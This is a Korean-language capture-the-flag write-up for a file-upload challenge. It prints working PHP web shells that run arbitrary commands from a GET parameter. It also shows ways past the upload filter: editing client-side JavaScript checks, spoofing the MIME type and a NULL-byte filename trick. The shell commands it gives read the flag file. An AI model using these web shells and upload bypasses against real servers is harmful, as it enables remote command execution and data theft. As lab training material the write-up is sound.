[SegFault] (File Vuln) - Web Shell 2

[SegFault] (File Vuln)

Web Shell 2

Web 서버 내에서 flag.txt 파일을 찾아내라!

문제 파악

본 문제는 File Vulnerability에 관한 문제로서, 'Server Side Script' File, 즉 웹 쉘(Web Shell)을 Upload 하고, 해당 웹 쉘의 업로드 위치를 찾아 실행 시켜 flag.txt 파일을 찾는 문제이다.

 

Vuln Point

게시판의 글쓰기 기능에서 파일 업로드 시에 javascript에서 화이트리스트 방식을 이용하여 확장자의 제한을 두고 있는 것을 확인할 수 있다.

<script type="text/javascript">
		function checkFileExtension(fileName) {
  			var reg = /(.*?)\.(jpg|jpeg|png|gif|bmp|txt)$/;
			var allowedExtensions = /(\.jpg|\.jpeg|\.png|\.gif)$/i;

			if(fileName==""){return true;}
			if(!allowedExtensions.exec(fileName)) {
  				alert('업로드할 수 없는 확장자의 파일입니다.');
  				writeFrm.upload_file.value = '';
  				return false;
			}else{
				return true;
		}		 
			return true;
		}
</script>

위와 같이 허용된 확장자 이외의 확장자를 막고 있는 것이다. 하지만 javascript로의 확장자 제한은 우회가 가능하다.

---

풀이 과정 (해결 방안)

한줄 웹 쉘

기본적인 한 줄 웹쉘은 다음과 같다.

<?php
echo system($_GET['cmd']);           
?>

위와 같은 간단한 웹 쉘을 사용하는 것이 일반적이지만, 브라우저에서 테스트하기 편하도록 아래와 같이 수정한 웹 쉘 코드를 사용할 것이다.

 

사용한 웹 쉘 코드

사용하기 편하도록 수정한 웹 쉘 코드이다.

<?php
    echo 'Enter a Command:<br>';
    echo '<form action="" method="get">';
    echo '<input type="text" name="cmd">';
    echo '<input type="submit">';
    echo '</form>';
    
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
?>

 

웹 쉘 업로드

게시판의 업로드 기능에서 확장자 검증이 이루어지고 있어서  (.php) 파일의 업로드는 불가능하다.

하지만 이것을 우회하는 방법이 존재한다.

1. javascript 수정

위의 코드를 보면 허용된 확장자 이외의 확장자의 경우 false를 반환해주고, 허용된 확장자에 한해서만 true를 반환해주고 있다. 즉, true가 반환되기만 하면 확장자 검증을 우회할 수 있다는 것이다.

1-2. 반환 값 수정

if(!allowedExtensions.exec(fileName)) {
  	alert('업로드할 수 없는 확장자의 파일입니다.');
  	writeFrm.upload_file.value = '';
  	return false;
}

위의 허용되지 않은 확장자 부분에서 false를 반환해주고 있지만 javascript 수정을 통해 다음과 같이 바꿔준다면 우회가 가능하다.

if(!allowedExtensions.exec(fileName)) {
  	//alert('업로드할 수 없는 확장자의 파일입니다.');
  	//writeFrm.upload_file.value = '';
  	return true;
}

허용되지 않은 확장자가 들어와도 true를 반환하도록 하는 것이다.

 

1-2. javascript 확장자 추가

javascript의 허용된 확장자 부분에 원하는 확장자를 추가하는 방법이 있다.

var reg = /(.*?)\.(jpg|jpeg|png|gif|bmp|txt)$/;
var allowedExtensions = /(\.jpg|\.jpeg|\.png|\.gif)$/i;

위와 같이 허용된 확장자가 제한되어 있는 것에 .php를 추가하면 된다.

---

2. MIME Type 수정

MIME (multipurpose internet mail extensions)
이미지 파일은 바이너리 값으로 이루어져 있어 텍스트로 인코딩하여 보내야 데이터값을 주고받을 수 있다.
그래서 공격을 위한 파일 업로드를 할 때 content-type을 맞게 수정해야 한다.

php 파일이 업로드 되는 경우 Content-Type은 text/php라고 올라가게 된다. 이것을 수정하여 업로드가 가능한 image/png 와 같이 변조해주는 방법이 있다.

 

3. 확장자 속이기 NULL

NULL Byte ' %00 ' 를 이용하는 방법이다.

본 문제의 확장자 검증은 파일명의 마지막 .png 와 같은 확장자를 인식하게 되어 있다.

그러므로 NULL Byte를 이용하면 우회가 가능한 것이다.

web_shell.php%00.png

위와 같이 NULL Byte를 이용하면 확장자가 .png 처럼 보이지만 실제로는 %00값이 NULL 이기 때문에 그 뒷부분이 날아가고 web_shell.php만 남게 되는 것이다.

문제 해결에는 이 방식을 사용할 것이다.

---

업로드 파일 위치

위의 웹 쉘을 업로드 한 후, 다운로드 링크를 확인하면 경로는 다음과 같다.

http://ctf.segfaulthub.com:7979/webshell_2/web_shell.php%00.png

이것만 보고는 경로를 알 수가 없는데, 디렉터리 인덱싱 취약점이 존재했다.

Index of /webshell_2/files/gear/

이를 이용하여 위와같은 경로에 파일이 존재하는 것을 확인할 수 있었다.

 

웹 쉘 실행

http://ctf.segfaulthub.com:7979/webshell_2/files/gear/web_shell.php%00.png

NULL Byte를 이용하여 업로드시에 파일명을 속였기 때문에 위와 같이 입력하면 파일이 없다.

파일이 업로드 되면서 %00뒤의 .png가 %00(=NULL)과 함께 날아갔기 때문에 파일명이 실제로는 web_shell.php가 되었기 때문이다.

그렇기 때문에 web_shell.php%00.png 가 아니라 web_shell.php을 입력해줘야 한다.

http://ctf.segfaulthub.com:7979/webshell_2/files/gear/web_shell.php

위와 같이 입력하면 성공적으로 웹 쉘로의 접근이 가능하다.

 

flag 찾기

위의 웹 쉘을 통해 flag를 찾아야한다.

dir ../../

위와 같이 입력하여 어떤 디렉터리들이 있는지 확인해본 결과  secret_file 이라는 디렉토리가 보인다.

dir ../../secret_file

위와 같이 입력하여 해당 디렉터리 내부를 확인해본 결과 flag.txt파일이 존재하는 것을 확인할 수 있었다.

내용을 확인하기 위해 cat 명령어를 이용한다.

cat ../../secret_file/flag.txt

위와 같이 입력한 결과 flag를 획득할 수 있었다.

---

생각해 볼 점

find 명령어

find 명령어를 이용하여 찾을 수도 있었겠지만, 해당 명령어를 이용하려면 찾으려는 파일의 이름을 확실하게 알고 있는 경우에만 가능하기 때문에 직접 찾아보는 방식을 선택하였다.

find 명령어를 사용하는 경우는 다음과 같다.

find / -name flag.txt

업로드 우회

확장자가 제한되어 있을 때 업로드 가능한 방식에 대하여 여러가지로 알아봐야, 본 문제와 같이 업로드가 가능하다는 것을 인지해야 한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영